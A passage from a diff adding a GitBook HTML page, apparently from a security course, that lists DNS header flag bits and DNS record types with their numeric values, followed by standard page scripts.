+ <th style="text-align:center">Bit</th>
1531
+ <th>Flag</th>
1532
+ <th>Description</th>
1533
+ <th>Reference</th>
1534
+ </tr>
1535
+ </thead>
1536
+ <tbody>
1537
+ <tr>
1538
+ <td style="text-align:center">bit 5</td>
1539
+ <td>AA</td>
1540
+ <td>Authoritative Answer</td>
1541
+ <td>[RFC1035]</td>
1542
+ </tr>
1543
+ <tr>
1544
+ <td style="text-align:center">bit 6</td>
1545
+ <td>TC</td>
1546
+ <td>Truncated Response</td>
1547
+ <td>[RFC1035]</td>
1548
+ </tr>
1549
+ <tr>
1550
+ <td style="text-align:center">bit 7</td>
1551
+ <td>RD</td>
1552
+ <td>Recursion Desired</td>
1553
+ <td>[RFC1035]</td>
1554
+ </tr>
1555
+ <tr>
1556
+ <td style="text-align:center">bit 8</td>
1557
+ <td>RA</td>
1558
+ <td>Recursion Allowed</td>
1559
+ <td>[RFC1035]</td>
1560
+ </tr>
1561
+ <tr>
1562
+ <td style="text-align:center">bit 9</td>
1563
+ <td></td>
1564
+ <td>Reserved</td>
1565
+ <td></td>
1566
+ </tr>
1567
+ <tr>
1568
+ <td style="text-align:center">bit 10</td>
1569
+ <td>AD</td>
1570
+ <td>Authentic Data</td>
1571
+ <td>[RFC4035]</td>
1572
+ </tr>
1573
+ <tr>
1574
+ <td style="text-align:center">bit 11</td>
1575
+ <td>CD</td>
1576
+ <td>Checking Disabled</td>
1577
+ <td>[RFC4035]</td>
1578
+ </tr>
1579
+ </tbody>
1580
+ </table>
1581
+ <blockquote id="fn_4">
1582
+ <sup>4</sup>. <a href="http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4" target="_blank">DNS Lookups Types</a><a href="#reffn_4" title="Jump back to footnote [4] in the text."> &#x21A9;</a>
1583
+ </blockquote>
1584
+ <table>
1585
+ <thead>
1586
+ <tr>
1587
+ <th style="text-align:center">Type</th>
1588
+ <th style="text-align:center">Value</th>
1589
+ <th style="text-align:center">Description</th>
1590
+ </tr>
1591
+ </thead>
1592
+ <tbody>
1593
+ <tr>
1594
+ <td style="text-align:center">A</td>
1595
+ <td style="text-align:center">1</td>
1596
+ <td style="text-align:center">IP Address</td>
1597
+ </tr>
1598
+ <tr>
1599
+ <td style="text-align:center">NS</td>
1600
+ <td style="text-align:center">2</td>
1601
+ <td style="text-align:center">Name Server</td>
1602
+ </tr>
1603
+ <tr>
1604
+ <td style="text-align:center">CNAME</td>
1605
+ <td style="text-align:center">5</td>
1606
+ <td style="text-align:center">Alias of a domain name</td>
1607
+ </tr>
1608
+ <tr>
1609
+ <td style="text-align:center">PTR</td>
1610
+ <td style="text-align:center">12</td>
1611
+ <td style="text-align:center">Reverse DNS Lookup using the IP Address</td>
1612
+ </tr>
1613
+ <tr>
1614
+ <td style="text-align:center">HINFO</td>
1615
+ <td style="text-align:center">13</td>
1616
+ <td style="text-align:center">Host Information</td>
1617
+ </tr>
1618
+ <tr>
1619
+ <td style="text-align:center">MX</td>
1620
+ <td style="text-align:center">15</td>
1621
+ <td style="text-align:center">MX Record</td>
1622
+ </tr>
1623
+ <tr>
1624
+ <td style="text-align:center">AXFR</td>
1625
+ <td style="text-align:center">252</td>
1626
+ <td style="text-align:center">Request for Zone Transfer</td>
1627
+ </tr>
1628
+ <tr>
1629
+ <td style="text-align:center">ANY</td>
1630
+ <td style="text-align:center">255</td>
1631
+ <td style="text-align:center">Request for All Records</td>
1632
+ </tr>
1633
+ </tbody>
1634
+ </table>
1635
+
1636
+
1637
+ </section>
1638
+
1639
+
1640
+ </div>
1641
+ </div>
1642
+ </div>
1643
+
1644
+
1645
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html" class="navigation navigation-prev " aria-label="Previous page: ARP Spoofing"><i class="fa fa-angle-left"></i></a>
1646
+
1647
+
1648
+ <a href="../module_0x4__web_kung_fu/index.html" class="navigation navigation-next " aria-label="Next page: Module 0x4 | Web Kung Fu"><i class="fa fa-angle-right"></i></a>
1649
+
1650
+ </div>
1651
+ </div>
1652
+
1653
+
1654
+ <script src="../gitbook/app.js"></script>
1655
+
1656
+
1657
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1658
+
1659
+
1660
+
1661
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1662
+
1663
+
1664
+
1665
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1666
+
1667
+
1668
+
1669
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1670
+
1671
+
1672
+
1673
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1674
+
1675
+
1676
+
1677
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1678
+
1679
+
1680
+
1681
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1682
+
1683
+
1684
+ <script>
1685
+ require(["gitbook"], function(gitbook) {
1686
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1687
+ gitbook.start(config);
1688
+ });
1689
+ </script>
1690
+
1691
+
1692
+ </body>
1693
+
1694
+ </html>